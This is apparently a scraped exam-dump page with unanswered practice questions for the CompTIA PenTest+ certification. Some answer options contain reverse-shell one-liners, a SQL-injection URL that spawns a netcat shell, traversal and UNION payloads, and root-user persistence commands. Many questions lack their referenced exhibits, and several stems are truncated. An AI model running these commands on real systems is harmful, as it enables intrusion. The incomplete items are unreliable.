Labour Day Special 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: exams65

CompTIA PenTest+ Certification Exam Question and Answers

CompTIA PenTest+ Certification Exam

Last Update Apr 25, 2024
Total Questions : 396

We are offering FREE PT0-002 CompTIA exam questions. All you do is to just go and sign up. Give your details, prepare PT0-002 free exam questions and then go for complete pool of CompTIA PenTest+ Certification Exam test questions that will help you more.

PT0-002 pdf

PT0-002 PDF

$35  $99.99
PT0-002 Engine

PT0-002 Testing Engine

$42  $119.99
PT0-002 PDF + Engine

PT0-002 PDF + Testing Engine

$56  $159.99
Questions 1

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

Options:

A.  

Understanding the tactics of a security intrusion can help disrupt them.

B.  

Scripts that are part of the framework can be imported directly into SIEM tools.

C.  

The methodology can be used to estimate the cost of an incident better.

D.  

The framework is static and ensures stability of a security program overtime.

Discussion 0
Questions 2

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?

Options:

A.  

nmap -F 192.168.5.5

B.  

nmap -datalength 2 192.168.5.5

C.  

nmap -D 10.5.2.2 192.168.5.5

D.  

nmap -scanflags SYNFIN 192.168.5.5

Discussion 0
Questions 3

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

Options:

A.  

Multiplexing

B.  

Bluejacking

C.  

Zero-day attack

D.  

Smurf attack

Discussion 0
Questions 4

A penetration tester is attempting to discover live hosts on a subnet quickly.

Which of the following commands will perform a ping scan?

Options:

A.  

nmap -sn 10.12.1.0/24

B.  

nmap -sV -A 10.12.1.0/24

C.  

nmap -Pn 10.12.1.0/24

D.  

nmap -sT -p- 10.12.1.0/24

Discussion 0
Questions 5

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Options:

A.  

Perform forensic analysis to isolate the means of compromise and determine attribution.

B.  

Incorporate the newly identified method of compromise into the red team’s approach.

C.  

Create a detailed document of findings before continuing with the assessment.

D.  

Halt the assessment and follow the reporting procedures as outlined in the contract.

Discussion 0
Questions 6

A compliance-based penetration test is primarily concerned with:

Options:

A.  

obtaining Pll from the protected network.

B.  

bypassing protection on edge devices.

C.  

determining the efficacy of a specific set of security standards.

D.  

obtaining specific information from the protected network.

Discussion 0
Questions 7

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

Options:

A.  

MD5

B.  

bcrypt

C.  

SHA-1

D.  

PBKDF2

Discussion 0
Questions 8

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

Options:

A.  

Socat

B.  

tcpdump

C.  

Scapy

D.  

dig

Discussion 0
Questions 9

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

Options:

A.  

devices produce more heat and consume more power.

B.  

devices are obsolete and are no longer available for replacement.

C.  

protocols are more difficult to understand.

D.  

devices may cause physical world effects.

Discussion 0
Questions 10

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.

Which of the following can be done with the pcap to gain access to the server?

Options:

A.  

Perform vertical privilege escalation.

B.  

Replay the captured traffic to the server to recreate the session.

C.  

Use John the Ripper to crack the password.

D.  

Utilize a pass-the-hash attack.

Discussion 0
Questions 11

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Options:

A.  

Shodan

B.  

Nmap

C.  

WebScarab-NG

D.  

Nessus

Discussion 0
Questions 12

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

Options:

A.  

Halt the penetration test.

B.  

Contact law enforcement.

C.  

Deconflict with the penetration tester.

D.  

Assume the alert is from the penetration test.

Discussion 0
Questions 13

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

Options:

A.  

Unsupported operating systems

B.  

Susceptibility to DDoS attacks

C.  

Inability to network

D.  

The existence of default passwords

Discussion 0
Questions 14

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

Options:

A.  

schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe

B.  

wmic startup get caption,command

C.  

crontab –l; echo “@reboot sleep 200 && ncat –lvp 4242 –e /bin/bash”) | crontab 2>/dev/null

D.  

sudo useradd –ou 0 –g 0 user

Discussion 0
Questions 15

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

  • Have a full TCP connection
  • Send a “hello” payload
  • Walt for a response
  • Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Options:

A.  

Run nmap –Pn –sV –script vuln .

B.  

Employ an OpenVAS simple scan against the TCP port of the host.

C.  

Create a script in the Lua language and use it with NSE.

D.  

Perform a credentialed scan with Nessus.

Discussion 0
Questions 16

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

Options:

A.  

Hydra

B.  

John the Ripper

C.  

Cain and Abel

D.  

Medusa

Discussion 0
Questions 17

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Options:

A.  

Edit the discovered file with one line of code for remote callback

B.  

Download .pl files and look for usernames and passwords

C.  

Edit the smb.conf file and upload it to the server

D.  

Download the smb.conf file and look at configurations

Discussion 0
Questions 18

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

Options:

A.  

Comma

B.  

Double dash

C.  

Single quote

D.  

Semicolon

Discussion 0
Questions 19

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

Options:

A.  

The HTTP port is not open on the firewall.

B.  

The tester did not run sudo before the command.

C.  

The web server is using HTTPS instead of HTTP.

D.  

This URI returned a server error.

Discussion 0
Questions 20

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

Options:

A.  

iam_enum_permissions

B.  

iam_privesc_scan

C.  

iam_backdoor_assume_role

D.  

iam_bruteforce_permissions

Discussion 0
Questions 21

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Options:

A.  

Nessus

B.  

ProxyChains

C.  

OWASPZAP

D.  

Empire

Discussion 0
Questions 22

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

Options:

A.  

John the Ripper

B.  

Hydra

C.  

Mimikatz

D.  

Cain and Abel

Discussion 0
Questions 23

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

Options:

A.  

A signed statement of work

B.  

The correct user accounts and associated passwords

C.  

The expected time frame of the assessment

D.  

The proper emergency contacts for the client

Discussion 0
Questions 24

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

Options:

A.  

Weekly

B.  

Monthly

C.  

Quarterly

D.  

Annually

Discussion 0
Questions 25

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

Options:

A.  

Scraping social media sites

B.  

Using the WHOIS lookup tool

C.  

Crawling the client’s website

D.  

Phishing company employees

E.  

Utilizing DNS lookup tools

F.  

Conducting wardriving near the client facility

Discussion 0
Questions 26

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

Options:

A.  

nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan

B.  

nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan

C.  

nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan

D.  

nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

Discussion 0
Questions 27

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

Options:

A.  

Badge cloning

B.  

Dumpster diving

C.  

Tailgating

D.  

Shoulder surfing

Discussion 0
Questions 28

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

........v -sV -p- 10.10.10.23-28

....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?

Options:

A.  

-su

B.  

-pn

C.  

-sn

D.  

-ss

Discussion 0
Questions 29

A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

Options:

A.  

Familiarity and likeness

B.  

Authority and urgency

C.  

Scarcity and fear

D.  

Social proof and greed

Discussion 0
Questions 30

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal

Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

Options:

A.  

nc 10.10.1.2

B.  

ssh 10.10.1.2

C.  

nc 127.0.0.1 5555

D.  

ssh 127.0.0.1 5555

Discussion 0
Questions 31

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

Options:

A.  

To provide protection against host OS vulnerabilities

B.  

To reduce the probability of a VM escape attack

C.  

To fix any misconfigurations of the hypervisor

D.  

To enable all features of the hypervisor

Discussion 0
Questions 32

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

Options:

A.  

Credential harvesting

B.  

Privilege escalation

C.  

Password spraying

D.  

Domain record abuse

Discussion 0
Questions 33

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

Options:

A.  

Add a web shell to the root of the website.

B.  

Upgrade the reverse shell to a true TTY terminal.

C.  

Add a new user with ID 0 to the /etc/passwd file.

D.  

Change the password of the root user and revert after the test.

Discussion 0
Questions 34

After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

Options:

A.  

smbspool //192.160.100.56/print$

B.  

net rpc share -S 192.168.100.56 -U ''

C.  

smbget //192.168.100.56/web -U ''

D.  

smbclient //192.168.100.56/web -U '' -N

Discussion 0
Questions 35

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

Options:

A.  

Active scanning

B.  

Ping sweep

C.  

Protocol reversing

D.  

Packet analysis

Discussion 0
Questions 36

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

Options:

A.  

To trick the systems administrator into installing a rootkit

B.  

To close down a reverse shell

C.  

To remove a web shell after the penetration test

D.  

To delete credentials the tester created

Discussion 0
Questions 37

After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:

Which of the following explains the reason why the command failed?

Options:

A.  

The tester input the incorrect IP address.

B.  

The command requires the ג-port 135 option.

C.  

An account for RDP does not exist on the server.

D.  

PowerShell requires administrative privilege.

Discussion 0
Questions 38

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

Options:

A.  

Situational awareness

B.  

Rescheduling

C.  

DDoS defense

D.  

Deconfliction

Discussion 0
Questions 39

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

Options:

A.  

sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.

B.  

*range(1, 1025) on line 1 populated the portList list in numerical order.

C.  

Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM

D.  

The remoteSvr variable has neither been type-hinted nor initialized.

Discussion 0
Questions 40

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

Options:

A.  

Multiple handshakes

B.  

IP addresses

C.  

Encrypted file transfers

D.  

User hashes sent over SMB

Discussion 0
Questions 41

A penetration tester ran the following command on a staging server:

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

Options:

A.  

nc 10.10.51.50 9891 < exploit

B.  

powershell –exec bypass –f \\10.10.51.50\9891

C.  

bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

D.  

wget 10.10.51.50:9891/exploit

Discussion 0
Questions 42

The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

Options:

A.  

This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

B.  

This device is most likely a gateway with in-band management services.

C.  

This device is most likely a proxy server forwarding requests over TCP/443.

D.  

This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Discussion 0
Questions 43

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

Options:

A.  

<#

B.  

<$

C.  

##

D.  

#$

E.  

#!

Discussion 0
Questions 44

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

Options:

A.  

Set up a captive portal with embedded malicious code.

B.  

Capture handshakes from wireless clients to crack.

C.  

Span deauthentication packets to the wireless clients.

D.  

Set up another access point and perform an evil twin attack.

Discussion 0
Questions 45

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

Options:

A.  

NDA

B.  

SLA

C.  

MSA

D.  

SOW

Discussion 0
Questions 46

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

Options:

A.  

Vulnerability scanning

B.  

Network segmentation

C.  

System hardening

D.  

Intrusion detection

Discussion 0
Questions 47

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

Options:

A.  

The tester had the situational awareness to stop the transfer.

B.  

The tester found evidence of prior compromise within the data set.

C.  

The tester completed the assigned part of the assessment workflow.

D.  

The tester reached the end of the assessment time frame.

Discussion 0
Questions 48

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

Options:

A.  

Send deauthentication frames to the stations.

B.  

Perform jamming on all 2.4GHz and 5GHz channels.

C.  

Set the malicious AP to broadcast within dynamic frequency selection channels.

D.  

Modify the malicious AP configuration to not use a pre-shared key.

Discussion 0
Questions 49

A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

Options:

A.  

Redirecting output from a file to a remote system

B.  

Building a scheduled task for execution

C.  

Mapping a share to a remote system

D.  

Executing a file on the remote system

E.  

Creating a new process on all domain systems

F.  

Setting up a reverse shell from a remote system

G.  

Adding an additional IP address on the compromised system

Discussion 0
Questions 50

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

Options:

A.  

Dictionary

B.  

Directory

C.  

Symlink

D.  

Catalog

E.  

For-loop

Discussion 0
Questions 51

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

Options:

A.  

OWASP ZAP

B.  

Nmap

C.  

Nessus

D.  

BeEF

E.  

Hydra

F.  

Burp Suite

Discussion 0
Questions 52

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

Options:

A.  

RFID cloning

B.  

RFID tagging

C.  

Meta tagging

D.  

Tag nesting

Discussion 0
Questions 53

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

Options:

A.  

Metasploit

B.  

Hydra

C.  

SET

D.  

WPScan

Discussion 0
Questions 54

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

Options:

A.  

Perform XSS.

B.  

Conduct a watering-hole attack.

C.  

Use BeEF.

D.  

Use browser autopwn.

Discussion 0
Questions 55

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

Options:

A.  

DirBuster

B.  

CeWL

C.  

w3af

D.  

Patator

Discussion 0
Questions 56

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

Options:

A.  

B.  

../../../../../../../../../../etc/passwd

C.  

/var/www/html/index.php;whoami

D.  

1 UNION SELECT 1, DATABASE(),3--

Discussion 0
Questions 57

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

Options:

A.  

Alert the target company of the discovered information.

B.  

Verify the discovered information is correct with the manufacturer.

C.  

Scan the equipment and verify the findings.

D.  

Return to the dumpster for more information.

Discussion 0
Questions 58

A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

Options:

A.  

Decode the authorization header using UTF-8.

B.  

Decrypt the authorization header using bcrypt.

C.  

Decode the authorization header using Base64.

D.  

Decrypt the authorization header using AES.

Discussion 0
Questions 59

When accessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:

..d index: eid in /apache/www/validate/user.php line 12

..d index: uid in /apache/www/validate/user.php line 13

..d index: pw in /apache/www/validate/user.php line 14

..d index: acl in /apache/www/validate/user.php line 15

Options:

A.  

Lack of code signing

B.  

Incorrect command syntax

C.  

Insufficient error handling

D.  

Insecure data transmission

Discussion 0
Questions 60

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?

Options:

A.  

The injection was too slow.

B.  

The DNS information was incorrect.

C.  

The DNS cache was not refreshed.

D.  

The client did not receive a trusted response.

Discussion 0
Questions 61

Which of the following is the most secure method for sending the penetration test report to the client?

Options:

A.  

Sending the penetration test report on an online storage system.

B.  

Sending the penetration test report inside a password-protected ZIP file.

C.  

Sending the penetration test report via webmail using an HTTPS connection.

D.  

Encrypting the penetration test report with the client’s public key and sending it via email.

Discussion 0
Questions 62

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

Options:

A.  

An unknown-environment assessment

B.  

A known-environment assessment

C.  

A red-team assessment

D.  

A compliance-based assessment

Discussion 0
Questions 63

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

Options:

A.  

SOW.

B.  

SLA.

C.  

ROE.

D.  

NDA

Discussion 0
Questions 64

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

Options:

A.  

Changing to Wi-Fi equipment that supports strong encryption

B.  

Using directional antennae

C.  

Using WEP encryption

D.  

Disabling Wi-Fi

Discussion 0
Questions 65

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

Options:

A.  

The IP address is wrong.

B.  

The server is unreachable.

C.  

The IP address is on the blocklist.

D.  

The IP address is on the allow list.

Discussion 0
Questions 66

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?

Options:

A.  

nmap -iL results 192.168.0.10-100

B.  

nmap 192.168.0.10-100 -O > results

C.  

nmap -A 192.168.0.10-100 -oX results

D.  

nmap 192.168.0.10-100 | grep "results"

Discussion 0
Questions 67

A penetration tester writes the following script:

Which of the following is the tester performing?

Options:

A.  

Searching for service vulnerabilities

B.  

Trying to recover a lost bind shell

C.  

Building a reverse shell listening on specified ports

D.  

Scanning a network for specific open ports

Discussion 0
Questions 68

A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

Options:

A.  

Tailgating

B.  

Dumpster diving

C.  

Shoulder surfing

D.  

Badge cloning

Discussion 0
Questions 69

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

Options:

A.  

Password brute force attack

B.  

SQL injection

C.  

Password spraying

D.  

Kerberoasting

Discussion 0
Questions 70

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

Options:

A.  

Wireshark

B.  

Gattacker

C.  

tcpdump

D.  

Netcat

Discussion 0
Questions 71

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY '00:00:05'

Which of the following should the penetration tester attempt NEXT?

Options:

A.  

http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'

B.  

http://company.com/catalog.asp?productid=22 ' OR 1=1 --

C.  

http://company.com/catalog.asp?productid=22 ' UNION SELECT 1,2,3 --

D.  

http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Discussion 0
Questions 72

A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?

Options:

A.  

..nmap -sU -sV -T4 -F target.company.com

B.  

..nmap -sS -sV -F target.company.com

C.  

..nmap -sT -v -T5 target.company.com

D.  

..nmap -sX -sC target.company.com

Discussion 0
Questions 73

In Python socket programming, SOCK_DGRAM type is:

Options:

A.  

reliable.

B.  

matrixed.

C.  

connectionless.

D.  

slower.

Discussion 0
Questions 74

ion tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the.. :tive way for the tester to achieve this objective?

Options:

A.  

Dropping USB flash drives around the company campus with the file on it

B.  

Attaching the file in a phishing SMS that warns users to execute the file or they will be locked out of their accounts

C.  

Sending a pretext email from the IT department before sending the download instructions later

D.  

Saving the file in a common folder with a name that encourages people to click it

Discussion 0
Questions 75

A penetration tester is performing an assessment for an organization and must gather valid user credentials. Which of the following attacks would be best for the tester to use to achieve this objective?

Options:

A.  

Wardriving

B.  

Captive portal

C.  

Deauthentication

D.  

Impersonation

Discussion 0
Questions 76

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

Options:

A.  

Peach

B.  

WinDbg

C.  

GDB

D.  

OllyDbg

Discussion 0
Questions 77

Which of the following documents should be consulted if a client has an issue accepting a penetration test report that was provided?

Options:

A.  

Rules of engagement

B.  

Signed authorization letter

C.  

Statement of work

D.  

Non-disclosure agreement

Discussion 0
Questions 78

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

Which of the following commands should the engineer use to achieve the objective in the least amount of time?

Options:

A.  

nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100

B.  

nmap -TO -p 80 10.0.0.0/16

C.  

nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60

D.  

nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80

Discussion 0
Questions 79

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

Options:

A.  

/var/log/messages

B.  

/var/log/last_user

C.  

/var/log/user_log

D.  

/var/log/lastlog

Discussion 0
Questions 80

A potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a testing component crashes a system or service and leaves them unavailable for both legitimate users and further testing. Which of the following best describes this concept?

Options:

A.  

Retesting

B.  

De-escalation

C.  

Remediation

D.  

Collision detection

Discussion 0
Questions 81

A penetration tester is reviewing the logs of a proxy server and discovers the following URLs:

https://test.comptia.com/profile.php?userid=1546

https://test.cpmptia.com/profile.php?userid=5482

https://test.comptia.com/profile.php?userid=3618

Which of the following types of vulnerabilities should be remediated?

Options:

A.  

Insecure direct object reference

B.  

Improper error handling

C.  

Race condition

D.  

Weak or default configurations

Discussion 0
Questions 82

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

Options:

A.  

Bluejacking

B.  

Bluesnarfing

C.  

BLE attack

D.  

WPS PIN attack

Discussion 0
Questions 83

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?

Options:

A.  

CeWL

B.  

John the Ripper

C.  

Hashcat

D.  

Hydra

Discussion 0
Questions 84

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?

Options:

A.  

Executive summary

B.  

Vulnerability severity rating

C.  

Recommendations of mitigation

D.  

Methodology

Discussion 0
Questions 85

A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode

Which of the following is the most likely reason the penetration tester ran this command?

Options:

A.  

To search for passwords in the service directory

B.  

To list scheduled tasks that may be exploitable

C.  

To register a service to run as System

D.  

To find services that have unquoted service paths

Discussion 0
Questions 86

During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?

Options:

A.  

fori in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM)

conn = s.connect_ex((host_IP, i))

if (conn == 0):

print(fPort {i} OPEN’)

B.  

close ()

C.  

fori in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM) conn = s.connect—ex((host_IP, i)) if (conn == 0): print (f'Port {i} OPEN’) s.close ()

D.  

fori in range(1000, 2001): s = socket(AF—INET, SOCK_DGRAM) conn = s.connect—ex((host_IP, i)) if (conn == 0): print(f’Port {i} OPEN’) s.close ()

E.  

fori in range (1000, 2000): s = socket(SOCK_STREAM, AF_INET) conn = s.connect—ex((host—IP, i)) if (conn == 0): print (f'Port {i} OPEN') s.close()

Discussion 0
Questions 87

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

Options:

A.  

Increase password complexity.

B.  

Implement system hardening.

C.  

Restrict simultaneous user log-ins.

D.  

Require local network access.

Discussion 0
Questions 88

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

Options:

A.  

Remote file inclusion

B.  

Cross-site scripting

C.  

SQL injection

D.  

Insecure direct object references

Discussion 0
Questions 89

Within a Python script, a line that states print (var) outputs the following:

[{'1' : 'CentOS', '2' : 'Ubuntu'), {'1' : 'Windows 10', '2' : 'Windows Server 2016'}]

Which of the following objects or data structures is var ?

Options:

A.  

An array

B.  

A class

C.  

A dictionary

D.  

A list

Discussion 0
Questions 90

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Discussion 0
Questions 91

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

Options:

A.  

All of the ports in the target range are closed.

B.  

Nmap needs more time to scan the ports in the target range.

C.  

The ports in the target range cannot be scanned because they are common UDP ports.

D.  

All of the ports in the target range are open

Discussion 0
Questions 92

Which of the following tools would be best to use to conceal data in various kinds of image files?

Options:

A.  

Kismet

B.  

Snow

C.  

Responder

D.  

Metasploit

Discussion 0
Questions 93

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

Options:

A.  

Implementation of patching and change control programs

B.  

Revision of client scripts used to perform system updates

C.  

Remedial training for the client's systems administrators

D.  

Refrainment from patching systems until quality assurance approves

Discussion 0
Questions 94

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?

Options:

A.  

Kismet

B.  

Burp Suite

C.  

BeEF

D.  

WHOIS

Discussion 0
Questions 95

A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?

Options:

A.  

Contact the high-profile celebrities.

B.  

Delete the high-profile accounts.

C.  

